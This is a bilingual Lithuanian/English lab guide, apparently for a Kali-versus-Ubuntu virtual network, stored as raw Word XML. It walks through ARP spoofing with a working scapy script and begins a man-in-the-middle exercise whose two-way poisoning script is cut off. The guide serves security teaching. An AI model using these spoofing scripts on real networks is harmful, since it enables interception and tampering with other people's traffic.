        <w:t>* dst – Aukos MAC adresas. Mano atveju: 08:00:27:37:4e:f3</w:t>
      </w:r>
      <w:r w:rsidR="00AA240E" w:rsidRPr="00352171">
        <w:t>. (Adresą galtie rasti per skanavimą arba lengvesniu būdų, tai nueiti į aukos (Ubuntu) mašiną ir įvedę Terminale „ifconfig“ komandą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F61AB" w14:textId="5073342D" w:rsidR="00AA240E" w:rsidRPr="00352171" w:rsidRDefault="00AA240E" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>* psrc – Routerio ip adresas. Mano atveju: 10.0.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94E6D6" w14:textId="610E1322" w:rsidR="00AA240E" w:rsidRPr="00352171" w:rsidRDefault="00AA240E" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>* Hwsrc – Suklastotas MAC adresas. Mano atveju: 55:44:55:44:55:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E57237" w14:textId="265C2140" w:rsidR="00AA240E" w:rsidRPr="00352171" w:rsidRDefault="00AA240E" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>* Pdst – Aukos IP adresas. Mano atveju: 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD79434" w14:textId="0A9C9AF3" w:rsidR="00AA240E" w:rsidRPr="00352171" w:rsidRDefault="00AA240E" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:t>* Hwdst – Aukos MAC adresas. Mano Atveju 08:00:27:37:4e:f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234141D1" w14:textId="47796863" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="008647F4">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242729E1" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>For this attack we will use the Python tool scapy (a network packet crafting library). In the terminal run cd /home/kali/Documents/ and then touch arp_spoofing.py. Next run nano arp_spoofing.py and write the code for your scenario. To exit, save everything with CTRL+S and quit with CTRL+X. Note that loop = 1 means the code will run continuously; to stop it use CTRL+C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F0EE54" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF"/>
    <w:p w14:paraId="62377D85" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D74CBC" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF"/>
    <w:p w14:paraId="2FA76D9D" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>ether = Ether(src="55:44:55:44:55:44", dst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524E50B" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF"/>
    <w:p w14:paraId="3373BC00" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>arp = ARP(op=2, psrc="10.0.2.1", hwsrc="55:44:55:44:55:44", pdst="10.0.2.4", hwdst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A002024" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF"/>
    <w:p w14:paraId="71DE049A" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>frame=ether/arp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D638E24" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>sendp(frame, loop=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F50E135" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8EFB3" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="008647F4"/>
    <w:p w14:paraId="7B995B6A" w14:textId="43E26AD7" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">* src – </w:t>
      </w:r>
      <w:r w:rsidR="00887774" w:rsidRPr="00352171">
        <w:t xml:space="preserve">Spoofed </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>MAC address. In my case: 55:44:55:44:55:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554DB62" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>* dst – Victim’s MAC address. In my case: 08:00:27:37:4e:f3. (You can find this address via scanning or, more simply, go to the victim (Ubuntu) machine and run ifconfig in the Terminal.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63710B67" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>* psrc – Router IP address. In my case: 10.0.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CF4F3B" w14:textId="3E086F7C" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">* Hwsrc – </w:t>
      </w:r>
      <w:r w:rsidR="00887774" w:rsidRPr="00352171">
        <w:t>Spoofed</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> MAC address. In my case: 55:44:55:44:55:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F319E" w14:textId="77777777" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF" w:rsidP="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:t>* Pdst – Victim IP address. In my case: 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440D785" w14:textId="77777777" w:rsidR="00F8177D" w:rsidRPr="00352171" w:rsidRDefault="003E24FF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* Hwdst – Victim MAC address. In my case: 08:00:27:37:4e:f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080ECEEF" w14:textId="45D9018B" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="003E24FF">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="182769DD" w14:textId="01F1B487" w:rsidR="00C5167D" w:rsidRPr="00352171" w:rsidRDefault="00C5167D" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30A74422" wp14:editId="3D3B954A">
            <wp:extent cx="6448425" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1656840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0966" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6448425" cy="2038350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0ED2C" w14:textId="322D51CD" w:rsidR="00C5167D" w:rsidRPr="00352171" w:rsidRDefault="00C5167D" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA7F0EE" wp14:editId="52FAD0EA">
            <wp:extent cx="5495925" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="12914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08" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495925" cy="1219200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5C45A" w14:textId="2571AAA5" w:rsidR="00C5167D" w:rsidRPr="00352171" w:rsidRDefault="00C5167D" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14AC4500" wp14:editId="445770EF">
            <wp:extent cx="6645910" cy="1080135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="20561219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1959" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1080135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167A4B1" w14:textId="77777777" w:rsidR="00C5167D" w:rsidRPr="00352171" w:rsidRDefault="00C5167D" w:rsidP="00995B54"/>
    <w:p w14:paraId="2962E568" w14:textId="3B150B84" w:rsidR="003E24FF" w:rsidRPr="00352171" w:rsidRDefault="00C5167D" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761656CD" w14:textId="70763875" w:rsidR="00C5167D" w:rsidRPr="00352171" w:rsidRDefault="00C5167D" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>Prieš naudojant ARP klastojimo skriptą, išvalykite aukos (Ubuntu) ARP lentelę, kad matytumėte efektą. Tai padaryti galite aukos terminale: „ip -s -s neigh flush all“. Paleidžiate savo skriptą naudojant Kali terminalą: „python arp_spoofing.py“. Einate atgal į aukos terminalą ir įvedate „arp -n“, kad pamatytumėte rezultatą. Kaip matote, prie 10.0.2.1 (IP) adreso auka išsaugojo mūsų netikrą 55:44:55:44:55:44 (MAC) adresą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF78EA6" w14:textId="0B8C931C" w:rsidR="00887774" w:rsidRPr="00352171" w:rsidRDefault="00887774" w:rsidP="00995B54">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA2FD29" w14:textId="65326DB9" w:rsidR="00887774" w:rsidRPr="00352171" w:rsidRDefault="00887774" w:rsidP="00995B54">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Before using the ARP spoofing script, clear the victim (Ubuntu) ARP table so you can see the effect. You can do this on the victim’s terminal with: ip -s -s neigh flush all.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>Start your script from the Kali terminal: python arp_spoofing.py.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>Go back to the victim’s terminal and run arp -n to view the result.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>As you can see, for the 10.0.2.1 (IP) address the victim has stored our spoofed 55:44:55:44:55:44 (MAC) address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A35F8D" w14:textId="68F3BEEE" w:rsidR="00BC742C" w:rsidRPr="00352171" w:rsidRDefault="00BC742C" w:rsidP="00995B54"/>
    <w:p w14:paraId="69F09A7B" w14:textId="77777777" w:rsidR="00BC742C" w:rsidRPr="00352171" w:rsidRDefault="00BC742C">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433F967" w14:textId="55EF77F4" w:rsidR="00BC742C" w:rsidRPr="00352171" w:rsidRDefault="00BC742C" w:rsidP="00BC742C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E72C3D" w14:textId="58943BB0" w:rsidR="00BC742C" w:rsidRPr="00352171" w:rsidRDefault="00BC742C" w:rsidP="00BC742C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Man In The Middle ataka</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Man In The Middle attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF14A8B" w14:textId="752B5048" w:rsidR="00BC742C" w:rsidRPr="00352171" w:rsidRDefault="00BC742C" w:rsidP="00BC742C"/>
    <w:p w14:paraId="21E14336" w14:textId="2514BBB6" w:rsidR="00BC742C" w:rsidRPr="00352171" w:rsidRDefault="00BC742C" w:rsidP="00BC742C">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C7527" w14:textId="6D835B4C" w:rsidR="007838E4" w:rsidRPr="00352171" w:rsidRDefault="007838E4" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:t>MITM yra panašus į ARP spoofing, bet šiek tiek veikia kitaip: mes paliekam routerio IP tą patį, bet pakeičiam jo MAC adresą į savo. Taip auka siunčia duomenis mums, manydama, kad kalba su maršrutizatoriumi. Tuo pačiu siunčiame ir melagingus paketų įrašus maršrutizatoriui — nurodome aukos IP, bet savo MAC — kad įsiterptume į jų ryšį. Per visą ataką mūsų Kali mašina turi veikti kaip maršrutizatorius: ji priima užklausas iš aukos ir routerio ir persiunčia jas toliau (taip galėdami stebėti ar modifikuoti duomenis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F7C00" w14:textId="03A12F7E" w:rsidR="007838E4" w:rsidRPr="00352171" w:rsidRDefault="007838E4" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128952EC" w14:textId="65F6178C" w:rsidR="007838E4" w:rsidRPr="00352171" w:rsidRDefault="007838E4" w:rsidP="007838E4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>MITM is similar to ARP spoofing but works a bit differently: we keep the router's IP the same but replace its MAC address with ours. That way the victim sends data to us, believing they're talking to the router. At the same time we send spoofed packets to the router — using the victim's IP but our MAC — to insert ourselves into their communication. Throughout the attack our Kali machine must operate in routing mode: it receives requests from both the victim and the router and forwards them onward (allowing us to monitor or modify the traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B842068" w14:textId="19BB72C8" w:rsidR="007838E4" w:rsidRPr="00352171" w:rsidRDefault="007838E4" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472F3048" wp14:editId="791E355D">
            <wp:extent cx="5267325" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="14553220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2096" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="1733550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="718ACB70" w14:textId="74AB7E39" w:rsidR="005D5A4B" w:rsidRPr="00352171" w:rsidRDefault="005D5A4B" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCAA761" wp14:editId="45840DA1">
            <wp:extent cx="5172075" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="917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50" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5172075" cy="1552575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BF6CF" w14:textId="1E9FC54F" w:rsidR="005D5A4B" w:rsidRPr="00352171" w:rsidRDefault="005D5A4B" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72612D88" wp14:editId="63CF244D">
            <wp:extent cx="6143625" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="19443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24140" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6143625" cy="1828800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C133427" w14:textId="42AC0FE8" w:rsidR="005D5A4B" w:rsidRPr="00352171" w:rsidRDefault="005D5A4B" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DEB0DBF" wp14:editId="0E901D09">
            <wp:extent cx="5753100" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="251562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62140" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753100" cy="2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74054BBD" w14:textId="74484DB4" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14D9DBF8" wp14:editId="7D68331B">
            <wp:extent cx="6592220" cy="847843"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="177569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86" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6592220" cy="847843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CC3A1" w14:textId="316C436A" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2163026A" wp14:editId="4A3A5868">
            <wp:extent cx="6645910" cy="1756410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1284884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84740" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1756410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EC17F7" w14:textId="77777777" w:rsidR="005D5A4B" w:rsidRPr="00352171" w:rsidRDefault="005D5A4B" w:rsidP="007838E4"/>
    <w:p w14:paraId="1BAC079C" w14:textId="34C11365" w:rsidR="005D5A4B" w:rsidRPr="00352171" w:rsidRDefault="005D5A4B" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D6CDE" w14:textId="1979DDDF" w:rsidR="005D5A4B" w:rsidRPr="00352171" w:rsidRDefault="005D5A4B" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:t>Kad MITM pilnai veiktų, reikia nustatyti, kad Kali veiktų maršrutizatoriaus rėžime (galėtų siųsti paketus). Tai padaryti galite Kali terminale įvedant: „sudo sysctl -w net.ipv4.ip_forward=1“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F47159C" w14:textId="5FB7389C" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Kali sistemoje keliaujate į Documents aplankalą „cd /home/kali/Documents“ ir sukuriate MITM.py failą su komanda „touch MITM.py“. Kad sužinoti IP ir MAC adresą Kali sistemos, įvedate „ifconfig“. Ta patį atliekate su Ubuntu. Norėdami sužinoti routerio IP ir MAC adresą, Kali sistemoje įvedate „arp -n“. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE71CEF" w14:textId="4519F513" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="007838E4">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Norėdami sukurti ataką Kali sistemoje, naudojame prieš tai sukurtą failą: „MITM.py“  Atidarome jį naudojant „nano MITM.py“ ir įkeliame skriptą. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782700D8" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999"/>
    <w:p w14:paraId="562995C4" w14:textId="0A04002B" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6590B62B" w14:textId="0B58510A" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA977B1" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F61CCF8" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>ether_victim = Ether(dst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56010FBF" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>arp_victim = ARP(op=2, psrc="10.0.2.2", hwsrc="08:00:27:1f:b7:23",  pdst="10.0.2.4", hwdst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6016F" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>frame_victim = ether_victim/arp_victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2431BA25" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>ether_gateway = Ether(dst="08:00:27:d2:d3:36")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BEE77A" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>arp_gateway = ARP(op=2, psrc="10.0.2.4", hwsrc="08:00:27:1f:b7:23", pdst="10.0.2.2", hwdst="08:00:27:d2:d3:36")</w:t>
      </w:r>
    </w:p>
